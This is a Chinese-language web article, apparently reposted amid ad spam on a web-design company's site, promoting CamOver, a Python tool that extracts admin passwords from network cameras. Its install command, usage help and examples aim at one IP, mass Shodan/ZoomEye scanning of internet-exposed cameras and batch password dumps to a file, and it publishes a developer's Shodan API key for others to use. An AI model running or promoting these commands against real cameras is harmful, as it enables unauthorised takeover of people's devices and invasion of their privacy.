CamOver:一款功能强大的摄像头漏洞利用工具

[[414433]]

关于CamOver

CamOver是一款功能强大的摄像头漏洞利用工具,在该工具的帮助下,广大研究人员可以轻松破解掉你家网络摄像头的管理员密码,并接管你的摄像头。

淮滨网站制作公司哪家好,找成都创新互联!从网页设计、网站建设、微信开发、APP开发、自适应网站建设等网站项目制作,到程序开发,运营维护。成都创新互联从2013年开始到现在10年的时间,我们拥有了丰富的建站经验和运维经验,来保证我们的工作的顺利进行。专注于网站建设就选成都创新互联

功能介绍

  • 该工具能够发现并利用大多数主流型号网络摄像头中的安全漏洞,例如CCTV、GoAhead和Netwave等。
  • 经过优化,支持多线程同时攻击多个摄像头。
  • 简单的命令行接口和API用法。

工具安装

由于CamOver使用Python3开发,因此首先需要在本地设备上安装并配置好Python3环境。接下来,广大研究人员可以使用下列命令下载并安装CamOver:

 
 
    
  
  
  1. pip3 install git+https://github.com/EntySec/CamOver 
    2.

基础使用

CamOver的使用非常简单,我们只需要在命令行终端中输入“camover”命令即可使用CamOver:

 
 
    
  
  
  1. usage: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN] 
    2. 
  
  
  2.  
    3. 
  
  
  3.                [--zoomeye ZOOMEYE] [-p PAGES] 
    4. 
  
  
  4.  
    5. 
  
  
  5.   
    6. 
  
  
  6.  
    7. 
  
  
  7. CamOver is a camera exploitation tool that allows to disclosure network camera 
    8. 
  
  
  8.  
    9. 
  
  
  9. admin password. 
    10. 
  
  
  10.  
    11. 
  
  
  11.   
    12. 
  
  
  12.  
    13. 
  
  
  13. optional arguments: 
    14. 
  
  
  14.  
    15. 
  
  
  15.   -h, --help            显示这个帮助信息并退出 
    16. 
  
  
  16.  
    17. 
  
  
  17.   -t, --threads          启用多线程模式以获得更好的性能 
    18. 
  
  
  18.  
    19. 
  
  
  19.   -o OUTPUT, --output OUTPUT 
    20. 
  
  
  20.  
    21. 
  
  
  21.                         将结果存储至文件 
    22. 
  
  
  22.  
    23. 
  
  
  23.   -i INPUT, --input INPUT 
    24. 
  
  
  24.  
    25. 
  
  
  25.                         地址输入文件 
    26. 
  
  
  26.  
    27. 
  
  
  27.   -a ADDRESS, --address ADDRESS 
    28. 
  
  
  28.  
    29. 
  
  
  29.                         提供单个地址 
    30. 
  
  
  30.  
    31. 
  
  
  31.   --shodan SHODAN       通过网络利用远程设备所使用的Shodan API密钥 
    32. 
  
  
  32.  
    33. 
  
  
  33.   --zoomeye ZOOMEYE     通过网络利用远程设备所使用的ZoomEye API密钥 
    34. 
  
  
  34.  
    35. 
  
  
  35.   -p PAGES, --pages PAGES 
    36. 
  
  
  36.  
    37. 
  
  
  37.                         需要通过ZoomEye获取的页面数量 
    38.

工具使用样例

(1) 攻击单个摄像头

下列命令可以攻击单个网络摄像头:

 
 
    
  
  
  1. camover -a 192.168.99.100 
    2.

(2) 通过网络攻击远程摄像头

接下来,我们可以使用Shodan搜索引擎来搜索并攻击网络上的摄像头,此时我们可以使用-t参数来设置多线程数量以获得更好的性能:

 
 
    
  
  
  1. camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD 
    2.

注意:项目中给出的Shodan API密钥(PSKINdQe1GyxGgecYz2191H2JoS9qvgD)是开发人员自己的专业版API密钥,你可以使用你自己的密钥,当然了你想用开发人员的也没意见,大家资源共享嘛!

(3) 从输入文件获取目标摄像头

我们还可以使用开放数据库中提供的摄像头地址,此时我们可以使用-t参数来设置多线程数量以获得更好的性能:

 
 
    
  
  
  1. camover -t -i cameras.txt -o passwords.txt 
    2.

注意:此命令将会攻击cameras.txt中给出的所有摄像头,并会将所有获取到的密码存储至passwords.txt文件中。

API使用

CamOver还提供了自己的Python API,可以将其导入至你们自己的项目代码中并调用其功能:

 
 
    
  
  
  1. from camover import CamOver 
    2.

调用样例

攻击单个摄像头:

 
 
    
  
  
  1. from camover import CamOver 
    2. 
  
  
  2.  
    3. 
  
  
  3.   
    4. 
  
  
  4.  
    5. 
  
  
  5. camover = CamOver() 
    6. 
  
  
  6.  
    7. 
  
  
  7. creds = camover.exploit('192.168.99.100') 
    8. 
  
  
  8.  
    9. 
  
  
  9.   
    10. 
  
  
  10.  
    11. 
  
  
  11. print(creds) 
    12.

项目地址

CamOver:【GitHub传送门】

网页题目:CamOver:一款功能强大的摄像头漏洞利用工具
URL地址:http://www.shufengxianlan.com/qtweb/news4/491554.html

网站建设、网络推广公司-创新互联,是专注品牌与效果的网站制作,网络营销seo公司;服务项目有等

广告

声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联

猜你还喜欢下面的内容

标签优化知识

同城分类信息

高防机房    丹棱网站建设    成都网站设计    德阳电信机房    外贸网站设计方案    乐山做网站    四川成都seo网站优化    成都云服务器    成都谷歌推广    衣柜书柜酒柜定制    成都户外广告牌设计    西部信息中心    鑫友邦火锅桌    成都标识标牌设计制作    网站推广公司    崇州网站建设    做网站价格    SSL认证    网络推广平台    分类目录网站